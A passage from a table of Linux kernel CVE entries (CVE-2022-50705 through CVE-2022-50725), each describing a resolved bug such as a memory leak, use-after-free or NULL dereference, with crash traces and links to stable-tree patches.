slab_pre_alloc_hook mm/slab.h:700 [inline] slab_alloc mm/slab.c:3278 [inline] __kmem_cache_alloc_lru mm/slab.c:3471 [inline] kmem_cache_alloc+0x39/0x520 mm/slab.c:3491 fanotify_alloc_fid_event fs/notify/fanotify/fanotify.c:580 [inline] fanotify_alloc_event fs/notify/fanotify/fanotify.c:813 [inline] fanotify_handle_event+0x1130/0x3f40 fs/notify/fanotify/fanotify.c:948 send_to_group fs/notify/fsnotify.c:360 [inline] fsnotify+0xafb/0x1680 fs/notify/fsnotify.c:570 __fsnotify_parent+0x62f/0xa60 fs/notify/fsnotify.c:230 fsnotify_parent include/linux/fsnotify.h:77 [inline] fsnotify_file include/linux/fsnotify.h:99 [inline] fsnotify_access include/linux/fsnotify.h:309 [inline] __io_complete_rw_common+0x485/0x720 io_uring/rw.c:195 io_complete_rw+0x1a/0x1f0 io_uring/rw.c:228 iomap_dio_complete_work fs/iomap/direct-io.c:144 [inline] iomap_dio_bio_end_io+0x438/0x5e0 fs/iomap/direct-io.c:178 bio_endio+0x5f9/0x780 block/bio.c:1564 req_bio_endio block/blk-mq.c:695 [inline] blk_update_request+0x3fc/0x1300 block/blk-mq.c:825 scsi_end_request+0x7a/0x9a0 drivers/scsi/scsi_lib.c:541 scsi_io_completion+0x173/0x1f70 drivers/scsi/scsi_lib.c:971 scsi_complete+0x122/0x3b0 drivers/scsi/scsi_lib.c:1438 blk_complete_reqs+0xad/0xe0 block/blk-mq.c:1022 __do_softirq+0x1d3/0x9c6 kernel/softirq.c:571 invoke_softirq kernel/softirq.c:445 [inline] __irq_exit_rcu+0x123/0x180 kernel/softirq.c:650 irq_exit_rcu+0x5/0x20 kernel/softirq.c:662 common_interrupt+0xa9/0xc0 arch/x86/kernel/irq.c:240 | 2025-12-24 | not yet calculated | CVE-2022-50705 | https://git.kernel.org/stable/c/89a410dbd0f159ddd308f19d6eb682fc753e4771 https://git.kernel.org/stable/c/2a853c206e553dd9c0a55c22858fd6a446d93e15 https://git.kernel.org/stable/c/b000145e9907809406d8164c3b2b8861d95aecd1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/ieee802154: don't warn zero-sized raw_sendmsg() syzbot is hitting skb_assert_len() warning at __dev_queue_xmit() [1], for PF_IEEE802154 socket's zero-sized raw_sendmsg() request is hitting __dev_queue_xmit() with skb->len == 0. Since PF_IEEE802154 socket's zero-sized raw_sendmsg() request was able to return 0, don't call __dev_queue_xmit() if packet length is 0. ---------- #include <sys/socket.h> #include <netinet/in.h> int main(int argc, char *argv[]) { struct sockaddr_in addr = { .sin_family = AF_INET, .sin_addr.s_addr = htonl(INADDR_LOOPBACK) }; struct iovec iov = { }; struct msghdr hdr = { .msg_name = &addr, .msg_namelen = sizeof(addr), .msg_iov = &iov, .msg_iovlen = 1 }; sendmsg(socket(PF_IEEE802154, SOCK_RAW, 0), &hdr, 0); return 0; } ---------- Note that this might be a sign that commit fd1894224407c484 ("bpf: Don't redirect packets with invalid pkt_len") should be reverted, for skb->len == 0 was acceptable for at least PF_IEEE802154 socket. | 2025-12-24 | not yet calculated | CVE-2022-50706 | https://git.kernel.org/stable/c/4a36de8947794fa21435d1e916e089095f3246a8 https://git.kernel.org/stable/c/791489a5c56396ddfed75fc525066d4738dace46 https://git.kernel.org/stable/c/34f31a2b667914ab701ca725554a0b447809d7ef https://git.kernel.org/stable/c/df0da3fc131132b6c32a15c4da4ffa3a5aea1af2 https://git.kernel.org/stable/c/9974d220c5073d035b5469d1d8ecd71da86c7afd https://git.kernel.org/stable/c/b12e924a2f5b960373459c8f8a514f887adf5cac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio-crypto: fix memory leak in virtio_crypto_alg_skcipher_close_session() 'vc_ctrl_req' is alloced in virtio_crypto_alg_skcipher_close_session(), and should be freed in the invalid ctrl_status->status error handling case. Otherwise there is a memory leak. | 2025-12-24 | not yet calculated | CVE-2022-50707 | https://git.kernel.org/stable/c/79026a2d0a1b080257773d22a493f9bcab8c65be https://git.kernel.org/stable/c/67fb59ff1384e338679c0eb7a43c83ce8868c9fa https://git.kernel.org/stable/c/0871df190fe6723464efe0f493d476411616f553 https://git.kernel.org/stable/c/b1d65f717cd6305a396a8738e022c6f7c65cfbe8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HSI: ssi_protocol: fix potential resource leak in ssip_pn_open() ssip_pn_open() claims the HSI client's port with hsi_claim_port(). When hsi_register_port_event() gets some error and returns a negetive value, the HSI client's port should be released with hsi_release_port(). Fix it by calling hsi_release_port() when hsi_register_port_event() fails. | 2025-12-24 | not yet calculated | CVE-2022-50708 | https://git.kernel.org/stable/c/78b0ef14896f843c45372f9bbdb6f6070f977eaf https://git.kernel.org/stable/c/e78b45b3eeee1cec77c794fcbf0512537c20b1dc https://git.kernel.org/stable/c/b28dbcb379e6a7f80262c2732a57681b1ee548ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: avoid uninit memory read in ath9k_htc_rx_msg() syzbot is reporting uninit value at ath9k_htc_rx_msg() [1], for ioctl(USB_RAW_IOCTL_EP_WRITE) can call ath9k_hif_usb_rx_stream() with pkt_len = 0 but ath9k_hif_usb_rx_stream() uses __dev_alloc_skb(pkt_len + 32, GFP_ATOMIC) based on an assumption that pkt_len is valid. As a result, ath9k_hif_usb_rx_stream() allocates skb with uninitialized memory and ath9k_htc_rx_msg() is reading from uninitialized memory. Since bytes accessed by ath9k_htc_rx_msg() is not known until ath9k_htc_rx_msg() is called, it would be difficult to check minimal valid pkt_len at "if (pkt_len > 2 * MAX_RX_BUF_SIZE) {" line in ath9k_hif_usb_rx_stream(). We have two choices. One is to workaround by adding __GFP_ZERO so that ath9k_htc_rx_msg() sees 0 if pkt_len is invalid. The other is to let ath9k_htc_rx_msg() validate pkt_len before accessing. This patch chose the latter. Note that I'm not sure threshold condition is correct, for I can't find details on possible packet length used by this protocol. | 2025-12-24 | not yet calculated | CVE-2022-50709 | https://git.kernel.org/stable/c/f3d2a3b7e290d0bdbddfcee5a6c3d922e2b7e02a https://git.kernel.org/stable/c/84242f15f911f34aec9b22f99d1e9bff19723dbe https://git.kernel.org/stable/c/2c485f4f2a64258acc5228e78ffb828c68d9e770 https://git.kernel.org/stable/c/9661724f6206bd606ecf13acada676a9975d230b https://git.kernel.org/stable/c/b1b4144508adfc585e43856b31baaf9008a3beb4 https://git.kernel.org/stable/c/0d2649b288b7b9484e3d4380c0d6c4720a17e473 https://git.kernel.org/stable/c/4891a50f5ed8bfcb8f2a4b816b0676f398687783 https://git.kernel.org/stable/c/b383e8abed41cc6ff1a3b34de75df9397fa4878c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: set tx_tstamps when creating new Tx rings via ethtool When the user changes the number of queues via ethtool, the driver allocates new rings. This allocation did not initialize tx_tstamps. This results in the tx_tstamps field being zero (due to kcalloc allocation), and would result in a NULL pointer dereference when attempting a transmit timestamp on the new ring. | 2025-12-24 | not yet calculated | CVE-2022-50710 | https://git.kernel.org/stable/c/624f03a027f2b18647cc4f1a7a81920a1e4e0201 https://git.kernel.org/stable/c/13180cb88a7be5ee389f65f6ab9f78e46f7722b2 https://git.kernel.org/stable/c/9eb5fff6b0e78819c758892282da5faa915724d0 https://git.kernel.org/stable/c/b3b173745c8cab1e24d6821488b60abed3acb24d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: mtk_eth_soc: fix possible memory leak in mtk_probe() If mtk_wed_add_hw() has been called, mtk_wed_exit() needs be called in error path or removing module to free the memory allocated in mtk_wed_add_hw(). | 2025-12-24 | not yet calculated | CVE-2022-50711 | https://git.kernel.org/stable/c/96bde7c4f5683d8c1c809ddb781ef3fdec9b7215 https://git.kernel.org/stable/c/b3d0d98179d62f9d55635a600679c4fa362baf8d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: devlink: hold region lock when flushing snapshots Netdevsim triggers a splat on reload, when it destroys regions with snapshots pending: WARNING: CPU: 1 PID: 787 at net/core/devlink.c:6291 devlink_region_snapshot_del+0x12e/0x140 CPU: 1 PID: 787 Comm: devlink Not tainted 6.1.0-07460-g7ae9888d6e1c #580 RIP: 0010:devlink_region_snapshot_del+0x12e/0x140 Call Trace: <TASK> devl_region_destroy+0x70/0x140 nsim_dev_reload_down+0x2f/0x60 [netdevsim] devlink_reload+0x1f7/0x360 devlink_nl_cmd_reload+0x6ce/0x860 genl_family_rcv_msg_doit.isra.0+0x145/0x1c0 This is the locking assert in devlink_region_snapshot_del(), we're supposed to be holding the region->snapshot_lock here. | 2025-12-24 | not yet calculated | CVE-2022-50712 | https://git.kernel.org/stable/c/49383d4e59bb704341aaa1d51440ccce58270e61 https://git.kernel.org/stable/c/6298cab4d80bfdb6fe01fe31fd9f0ba26317fdae https://git.kernel.org/stable/c/b4cafb3d2c740f8d1b1234b43ac4a60e5291c960 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: visconti: Fix memory leak in visconti_register_pll() @pll->rate_table has allocated memory by kmemdup(), if clk_hw_register() fails, it should be freed, otherwise it will cause memory leak issue, this patch fixes it. | 2025-12-24 | not yet calculated | CVE-2022-50713 | https://git.kernel.org/stable/c/70af9bf13be1716eac452c8a29ce6fe6b957a5db https://git.kernel.org/stable/c/f0f1982ddfb418bf7bf05dadebae5c6869a41d41 https://git.kernel.org/stable/c/b55226f8553d255f5002c751c7c6ba9291f34bf2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921e: fix rmmod crash in driver reload test In insmod/rmmod stress test, the following crash dump shows up immediately. The problem is caused by missing mt76_dev in mt7921_pci_remove(). We should make sure the drvdata is ready before probe() finished. [168.862789] ================================================================== [168.862797] BUG: KASAN: user-memory-access in try_to_grab_pending+0x59/0x480 [168.862805] Write of size 8 at addr 0000000000006df0 by task rmmod/5361 [168.862812] CPU: 7 PID: 5361 Comm: rmmod Tainted: G OE 5.19.0-rc6 #1 [168.862816] Hardware name: Intel(R) Client Systems NUC8i7BEH/NUC8BEB, 05/04/2020 [168.862820] Call Trace: [168.862822] <TASK> [168.862825] dump_stack_lvl+0x49/0x63 [168.862832] print_report.cold+0x493/0x6b7 [168.862845] kasan_report+0xa7/0x120 [168.862857] kasan_check_range+0x163/0x200 [168.862861] __kasan_check_write+0x14/0x20 [168.862866] try_to_grab_pending+0x59/0x480 [168.862870] __cancel_work_timer+0xbb/0x340 [168.862898] cancel_work_sync+0x10/0x20 [168.862902] mt7921_pci_remove+0x61/0x1c0 [mt7921e] [168.862909] pci_device_remove+0xa3/0x1d0 [168.862914] device_remove+0xc4/0x170 [168.862920] device_release_driver_internal+0x163/0x300 [168.862925] driver_detach+0xc7/0x1a0 [168.862930] bus_remove_driver+0xeb/0x2d0 [168.862935] driver_unregister+0x71/0xb0 [168.862939] pci_unregister_driver+0x30/0x230 [168.862944] mt7921_pci_driver_exit+0x10/0x1b [mt7921e] [168.862949] __x64_sys_delete_module+0x2f9/0x4b0 [168.862968] do_syscall_64+0x38/0x90 [168.862973] entry_SYSCALL_64_after_hwframe+0x63/0xcd Test steps: 1. insmode 2. do not ifup 3. rmmod quickly (within 1 second) | 2025-12-24 | not yet calculated | CVE-2022-50714 | https://git.kernel.org/stable/c/1034d8e08508830161377f136a060e78fc24f2a5 https://git.kernel.org/stable/c/ccda3ebdae719d348f90563b6719fba4929ae283 https://git.kernel.org/stable/c/b5a62d612b7baf6e09884e4de94decb6391d6a9d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid1: stop mdx_raid1 thread when raid1 array run failed fail run raid1 array when we assemble array with the inactive disk only, but the mdx_raid1 thread were not stop, Even if the associated resources have been released. it will caused a NULL dereference when we do poweroff. This causes the following Oops: [ 287.587787] BUG: kernel NULL pointer dereference, address: 0000000000000070 [ 287.594762] #PF: supervisor read access in kernel mode [ 287.599912] #PF: error_code(0x0000) - not-present page [ 287.605061] PGD 0 P4D 0 [ 287.607612] Oops: 0000 [#1] SMP NOPTI [ 287.611287] CPU: 3 PID: 5265 Comm: md0_raid1 Tainted: G U 5.10.146 #0 [ 287.619029] Hardware name: xxxxxxx/To be filled by O.E.M, BIOS 5.19 06/16/2022 [ 287.626775] RIP: 0010:md_check_recovery+0x57/0x500 [md_mod] [ 287.632357] Code: fe 01 00 00 48 83 bb 10 03 00 00 00 74 08 48 89 ...... [ 287.651118] RSP: 0018:ffffc90000433d78 EFLAGS: 00010202 [ 287.656347] RAX: 0000000000000000 RBX: ffff888105986800 RCX: 0000000000000000 [ 287.663491] RDX: ffffc90000433bb0 RSI: 00000000ffffefff RDI: ffff888105986800 [ 287.670634] RBP: ffffc90000433da0 R08: 0000000000000000 R09: c0000000ffffefff [ 287.677771] R10: 0000000000000001 R11: ffffc90000433ba8 R12: ffff888105986800 [ 287.684907] R13: 0000000000000000 R14: fffffffffffffe00 R15: ffff888100b6b500 [ 287.692052] FS: 0000000000000000(0000) GS:ffff888277f80000(0000) knlGS:0000000000000000 [ 287.700149] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 287.705897] CR2: 0000000000000070 CR3: 000000000320a000 CR4: 0000000000350ee0 [ 287.713033] Call Trace: [ 287.715498] raid1d+0x6c/0xbbb [raid1] [ 287.719256] ? __schedule+0x1ff/0x760 [ 287.722930] ? schedule+0x3b/0xb0 [ 287.726260] ? schedule_timeout+0x1ed/0x290 [ 287.730456] ? __switch_to+0x11f/0x400 [ 287.734219] md_thread+0xe9/0x140 [md_mod] [ 287.738328] ? md_thread+0xe9/0x140 [md_mod] [ 287.742601] ? wait_woken+0x80/0x80 [ 287.746097] ? md_register_thread+0xe0/0xe0 [md_mod] [ 287.751064] kthread+0x11a/0x140 [ 287.754300] ? kthread_park+0x90/0x90 [ 287.757974] ret_from_fork+0x1f/0x30 In fact, when raid1 array run fail, we need to do md_unregister_thread() before raid1_free(). | 2025-12-24 | not yet calculated | CVE-2022-50715 | https://git.kernel.org/stable/c/d684ceb77311410aeaf5189d321f9f564838c49a https://git.kernel.org/stable/c/110f14a7b2eb5b8aa9df5af2d629524f2a07d543 https://git.kernel.org/stable/c/0c7c7468c3ae222e297b7dc74d6ccb69c4d0183c https://git.kernel.org/stable/c/19d5a0e17aba92b10d895e40ec782768cf00da23 https://git.kernel.org/stable/c/10d713532ffc67b13df61ed9c138a8ce0a186236 https://git.kernel.org/stable/c/a3cc41e05e8af340a2a759b168c29fffdb9194eb https://git.kernel.org/stable/c/22be44212cad8be96860346882d8e694b0b437b6 https://git.kernel.org/stable/c/d26364596db8f8b55277b2afb3952e05a4057a21 https://git.kernel.org/stable/c/b611ad14006e5be2170d9e8e611bf49dff288911 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ar5523: Fix use-after-free on ar5523_cmd() timed out syzkaller reported use-after-free with the stack trace like below [1]: [ 38.960489][ C3] ================================================================== [ 38.963216][ C3] BUG: KASAN: use-after-free in ar5523_cmd_tx_cb+0x220/0x240 [ 38.964950][ C3] Read of size 8 at addr ffff888048e03450 by task swapper/3/0 [ 38.966363][ C3] [ 38.967053][ C3] CPU: 3 PID: 0 Comm: swapper/3 Not tainted 6.0.0-09039-ga6afa4199d3d-dirty #18 [ 38.968464][ C3] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.fc36 04/01/2014 [ 38.969959][ C3] Call Trace: [ 38.970841][ C3] <IRQ> [ 38.971663][ C3] dump_stack_lvl+0xfc/0x174 [ 38.972620][ C3] print_report.cold+0x2c3/0x752 [ 38.973626][ C3] ? ar5523_cmd_tx_cb+0x220/0x240 [ 38.974644][ C3] kasan_report+0xb1/0x1d0 [ 38.975720][ C3] ? ar5523_cmd_tx_cb+0x220/0x240 [ 38.976831][ C3] ar5523_cmd_tx_cb+0x220/0x240 [ 38.978412][ C3] __usb_hcd_giveback_urb+0x353/0x5b0 [ 38.979755][ C3] usb_hcd_giveback_urb+0x385/0x430 [ 38.981266][ C3] dummy_timer+0x140c/0x34e0 [ 38.982925][ C3] ? notifier_call_chain+0xb5/0x1e0 [ 38.984761][ C3] ? rcu_read_lock_sched_held+0xb/0x60 [ 38.986242][ C3] ? lock_release+0x51c/0x790 [ 38.987323][ C3] ? _raw_read_unlock_irqrestore+0x37/0x70 [ 38.988483][ C3] ? __wake_up_common_lock+0xde/0x130 [ 38.989621][ C3] ? reacquire_held_locks+0x4a0/0x4a0 [ 38.990777][ C3] ? lock_acquire+0x472/0x550 [ 38.991919][ C3] ? rcu_read_lock_sched_held+0xb/0x60 [ 38.993138][ C3] ? lock_acquire+0x472/0x550 [ 38.994890][ C3] ? dummy_urb_enqueue+0x860/0x860 [ 38.996266][ C3] ? do_raw_spin_unlock+0x16f/0x230 [ 38.997670][ C3] ? dummy_urb_enqueue+0x860/0x860 [ 38.999116][ C3] call_timer_fn+0x1a0/0x6a0 [ 39.000668][ C3] ? add_timer_on+0x4a0/0x4a0 [ 39.002137][ C3] ? reacquire_held_locks+0x4a0/0x4a0 [ 39.003809][ C3] ? __next_timer_interrupt+0x226/0x2a0 [ 39.005509][ C3] __run_timers.part.0+0x69a/0xac0 [ 39.007025][ C3] ? dummy_urb_enqueue+0x860/0x860 [ 39.008716][ C3] ? call_timer_fn+0x6a0/0x6a0 [ 39.010254][ C3] ? cpuacct_percpu_seq_show+0x10/0x10 [ 39.011795][ C3] ? kvm_sched_clock_read+0x14/0x40 [ 39.013277][ C3] ? sched_clock_cpu+0x69/0x2b0 [ 39.014724][ C3] run_timer_softirq+0xb6/0x1d0 [ 39.016196][ C3] __do_softirq+0x1d2/0x9be [ 39.017616][ C3] __irq_exit_rcu+0xeb/0x190 [ 39.019004][ C3] irq_exit_rcu+0x5/0x20 [ 39.020361][ C3] sysvec_apic_timer_interrupt+0x8f/0xb0 [ 39.021965][ C3] </IRQ> [ 39.023237][ C3] <TASK> In ar5523_probe(), ar5523_host_available() calls ar5523_cmd() as below (there are other functions which finally call ar5523_cmd()): ar5523_probe() -> ar5523_host_available() -> ar5523_cmd_read() -> ar5523_cmd() If ar5523_cmd() timed out, then ar5523_host_available() failed and ar5523_probe() freed the device structure. So, ar5523_cmd_tx_cb() might touch the freed structure. This patch fixes this issue by canceling in-flight tx cmd if submitted urb timed out. | 2025-12-24 | not yet calculated | CVE-2022-50716 | https://git.kernel.org/stable/c/c9ba3fbf6a488da6cad1d304c5234bd8d729eba3 https://git.kernel.org/stable/c/340524ae7b53a72cf5d9e7bd7790433422b3b12f https://git.kernel.org/stable/c/6447beefd21326a3f4719ec2ea511df797f6c820 https://git.kernel.org/stable/c/7360b323e0343ea099091d4ae09576dbe1f09516 https://git.kernel.org/stable/c/8af52492717e3538eba3f81d012b1476af8a89a6 https://git.kernel.org/stable/c/3eca9697c2f3905dea3ad2fc536ebaa1fbd735bd https://git.kernel.org/stable/c/601ae89375033ac4870c086e24ba03f235d38e55 https://git.kernel.org/stable/c/9aef34e1ae35a87e5f6a22278c17823b7ce64c88 https://git.kernel.org/stable/c/b6702a942a069c2a975478d719e98d83cdae1797 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmet-tcp: add bounds check on Transfer Tag ttag is used as an index to get cmd in nvmet_tcp_handle_h2c_data_pdu(), add a bounds check to avoid out-of-bounds access. | 2025-12-24 | not yet calculated | CVE-2022-50717 | https://git.kernel.org/stable/c/0d150ccd55dbfad36f55855b40b381884c98456e https://git.kernel.org/stable/c/d5bb45f47b37d10f010355686b28c9ebacb361d4 https://git.kernel.org/stable/c/ec8adf767e1cfa7031f853b8c71ba1963f07df15 https://git.kernel.org/stable/c/fcf82e4553db911d10234ff2390cfd0e2aa854e4 https://git.kernel.org/stable/c/752593d04637ebdc87fd29cba81897f21ae053f0 https://git.kernel.org/stable/c/b6a545ffa2c192b1e6da4a7924edac5ba9f4ea2b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix pci device refcount leak As comment of pci_get_domain_bus_and_slot() says, it returns a pci device with refcount increment, when finish using it, the caller must decrement the reference count by calling pci_dev_put(). So before returning from amdgpu_device_resume|suspend_display_audio(), pci_dev_put() is called to avoid refcount leak. | 2025-12-24 | not yet calculated | CVE-2022-50718 | https://git.kernel.org/stable/c/3725a8f26bdbc38dfdf545836117f1e069277c91 https://git.kernel.org/stable/c/02105f0b3021ee5853b2fa50853c42f35fc01cfd https://git.kernel.org/stable/c/f13661b72a61708cecb06562f8acff068a4f31f7 https://git.kernel.org/stable/c/d7352b410471cbebf6350b2990bae82bb0d59a76 https://git.kernel.org/stable/c/b85e285e3d6352b02947fc1b72303673dfacb0aa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: line6: fix stack overflow in line6_midi_transmit Correctly calculate available space including the size of the chunk buffer. This fixes a buffer overflow when multiple MIDI sysex messages are sent to a PODxt device. | 2025-12-24 | not yet calculated | CVE-2022-50719 | https://git.kernel.org/stable/c/b026af92b2cea907c780f7168c730c816cd33311 https://git.kernel.org/stable/c/49cb7737e733013ec86aa77ed2e19b94a68eaa05 https://git.kernel.org/stable/c/0c76087449ee4ed45a88b10017d02c6694caedb1 https://git.kernel.org/stable/c/25e8c6ecb46843a955f254b8f0d77894e4a53dc4 https://git.kernel.org/stable/c/66f359ad66d49f75d39ac729f9114dabf90b81bb https://git.kernel.org/stable/c/0c9118e381ff538874e00fd4e66a768273c150fb https://git.kernel.org/stable/c/61e4be4a60cc6de723f8c574ddbcb3025eb44cac https://git.kernel.org/stable/c/389d34c2a8b52acc351fd932ed4bea41fee5a39b https://git.kernel.org/stable/c/b8800d324abb50160560c636bfafe2c81001b66c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/apic: Don't disable x2APIC if locked The APIC supports two modes, legacy APIC (or xAPIC), and Extended APIC (or x2APIC). X2APIC mode is mostly compatible with legacy APIC, but it disables the memory-mapped APIC interface in favor of one that uses MSRs. The APIC mode is controlled by the EXT bit in the APIC MSR. The MMIO/xAPIC interface has some problems, most notably the APIC LEAK [1]. This bug allows an attacker to use the APIC MMIO interface to extract data from the SGX enclave. Introduce support for a new feature that will allow the BIOS to lock the APIC in x2APIC mode. If the APIC is locked in x2APIC mode and the kernel tries to disable the APIC or revert to legacy APIC mode a GP fault will occur. Introduce support for a new MSR (IA32_XAPIC_DISABLE_STATUS) and handle the new locked mode when the LEGACY_XAPIC_DISABLED bit is set by preventing the kernel from trying to disable the x2APIC. On platforms with the IA32_XAPIC_DISABLE_STATUS MSR, if SGX or TDX are enabled the LEGACY_XAPIC_DISABLED will be set by the BIOS. If legacy APIC is required, then it SGX and TDX need to be disabled in the BIOS. [1]: https://aepicleak.com/aepicleak.pdf | 2025-12-24 | not yet calculated | CVE-2022-50720 | https://git.kernel.org/stable/c/05785ba834f23272f9d23427ae4a80ac505a5296 https://git.kernel.org/stable/c/dd1241e00addbf0b95f6cd6ce32152692820657e https://git.kernel.org/stable/c/b8d1d163604bd1e600b062fb00de5dc42baa355f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: qcom-adm: fix wrong calling convention for prep_slave_sg The calling convention for pre_slave_sg is to return NULL on error and provide an error log to the system. Qcom-adm instead provide error pointer when an error occur. This indirectly cause kernel panic for example for the nandc driver that checks only if the pointer returned by device_prep_slave_sg is not NULL. Returning an error pointer makes nandc think the device_prep_slave_sg function correctly completed and makes the kernel panics later in the code. While nandc is the one that makes the kernel crash, it was pointed out that the real problem is qcom-adm not following calling convention for that function. To fix this, drop returning error pointer and return NULL with an error log. | 2025-12-24 | not yet calculated | CVE-2022-50721 | https://git.kernel.org/stable/c/5653bd0200944e5803fa8e32dc36aa49931312f9 https://git.kernel.org/stable/c/9a041174c58a226e713f6cebd41eccec7a5cfa72 https://git.kernel.org/stable/c/b9d2140c3badf4107973ad77c5a0ec3075705c85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: ipu3-imgu: Fix NULL pointer dereference in active selection access What the IMGU driver did was that it first acquired the pointers to active and try V4L2 subdev state, and only then figured out which one to use. The problem with that approach and a later patch (see Fixes: tag) is that as sd_state argument to v4l2_subdev_get_try_crop() et al is NULL, there is now an attempt to dereference that. Fix this. Also rewrap lines a little. | 2025-12-24 | not yet calculated | CVE-2022-50722 | https://git.kernel.org/stable/c/5265cc1202a31f7097691c3483a0d60d624424a5 https://git.kernel.org/stable/c/740717b756c17190dc2d2ad4c6de1e63f214e0c9 https://git.kernel.org/stable/c/b9eb3ab6f30bf32f7326909f17949ccb11bab514 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: fix memory leak in bnxt_nvm_test() Free the kzalloc'ed buffer before returning in the success path. | 2025-12-24 | not yet calculated | CVE-2022-50723 | https://git.kernel.org/stable/c/be083d97031712a2e16fd915ddb8fe1a6cb1fbc5 https://git.kernel.org/stable/c/ba077d683d45190afc993c1ce45bcdbfda741a40 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: fix resource leak in regulator_register() I got some resource leak reports while doing fault injection test: OF: ERROR: memory leak, expected refcount 1 instead of 100, of_node_get()/of_node_put() unbalanced - destroy cset entry: attach overlay node /i2c/pmic@64/regulators/buck1 unreferenced object 0xffff88810deea000 (size 512): comm "490-i2c-rt5190a", pid 253, jiffies 4294859840 (age 5061.046s) hex dump (first 32 bytes): 00 00 00 00 ad 4e ad de ff ff ff ff 00 00 00 00 .....N.......... ff ff ff ff ff ff ff ff a0 1e 00 a1 ff ff ff ff ................ backtrace: [<00000000d78541e2>] kmalloc_trace+0x21/0x110 [<00000000b343d153>] device_private_init+0x32/0xd0 [<00000000be1f0c70>] device_add+0xb2d/0x1030 [<00000000e3e6344d>] regulator_register+0xaf2/0x12a0 [<00000000e2f5e754>] devm_regulator_register+0x57/0xb0 [<000000008b898197>] rt5190a_probe+0x52a/0x861 [rt5190a_regulator] unreferenced object 0xffff88810b617b80 (size 32): comm "490-i2c-rt5190a", pid 253, jiffies 4294859904 (age 5060.983s) hex dump (first 32 bytes): 72 65 67 75 6c 61 74 6f 72 2e 32 38 36 38 2d 53 regulator.2868-S 55 50 50 4c 59 00 ff ff 29 00 00 00 2b 00 00 00 UPPLY...)...+... backtrace: [<000000009da9280d>] __kmalloc_node_track_caller+0x44/0x1b0 [<0000000025c6a4e5>] kstrdup+0x3a/0x70 [<00000000790efb69>] create_regulator+0xc0/0x4e0 [<0000000005ed203a>] regulator_resolve_supply+0x2d4/0x440 [<0000000045796214>] regulator_register+0x10b3/0x12a0 [<00000000e2f5e754>] devm_regulator_register+0x57/0xb0 [<000000008b898197>] rt5190a_probe+0x52a/0x861 [rt5190a_regulator] After calling regulator_resolve_supply(), the 'rdev->supply' is set by set_supply(), after this set, in the error path, the resources need be released, so call regulator_put() to avoid the leaks. | 2025-12-24 | not yet calculated | CVE-2022-50724 | https://git.kernel.org/stable/c/35593d60b1622834984c43add7646d4069671aa9 https://git.kernel.org/stable/c/6a03c31d08f95dca9633a552de167b9e625833a8 https://git.kernel.org/stable/c/c4c64d8abd656b9807b63178750fa91454602b86 https://git.kernel.org/stable/c/90b713aadc1240bf2dd03d610d6c1d016a9123a2 https://git.kernel.org/stable/c/f86b2f216636790d5922458578825e4628fb570f https://git.kernel.org/stable/c/ba62319a42c50e6254e98b3f316464fac8e77968 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: vidtv: Fix use-after-free in vidtv_bridge_dvb_init() KASAN reports a use-after-free: BUG: KASAN: use-after-free in dvb_dmxdev_release+0x4d5/0x5d0 [dvb_core] Call Trace: ... dvb_dmxdev_release+0x4d5/0x5d0 [dvb_core] vidtv_bridge_probe+0x7bf/0xa40 [dvb_vidtv_bridge] platform_probe+0xb6/0x170 ... Allocated by task 1238: ... dvb_register_device+0x1a7/0xa70 [dvb_core] dvb_dmxdev_init+0x2af/0x4a0 [dvb_core] vidtv_bridge_probe+0x766/0xa40 [dvb_vidtv_bridge] ... Freed by task 1238: dvb_register_device+0x6d2/0xa70 [dvb_core] dvb_dmxdev_init+0x2af/0x4a0 [dvb_core] vidtv_bridge_probe+0x766/0xa40 [dvb_vidtv_bridge] ... It is because the error handling in vidtv_bridge_dvb_init() is wrong. First, vidtv_bridge_dmx(dev)_init() will clean themselves when fail, but goto fail_dmx(_dev): calls release functions again, which causes use-after-free. Also, in fail_fe, fail_tuner_probe and fail_demod_probe, j = i will cause out-of-bound when i finished its loop (i == NUM_FE). And the loop releasing is wrong, although now NUM_FE is 1 so it won't cause problem. Fix this by correctly releasing everything. | 2025-12-24 | not yet calculated | CVE-2022-50725 | https://git.kernel.org/stable/c/0369af6fe33d4053899b121b32e91f870b2cf0ae https://git.kernel.org/stable/c/c290aa527fd832d278c6388a3ba53a9890fbd74a https://git.kernel.org/stable/c/06398ce69571a43a8a0dd0f1bfe35d221f726a6a https://git.kernel.org/stable/c/8a204a0b4a0d105229735222c515759ea2b126c1 https://git.kernel.org/stable/c/ba8d9405935097e296bcf7a942c3a01df0edb865 |
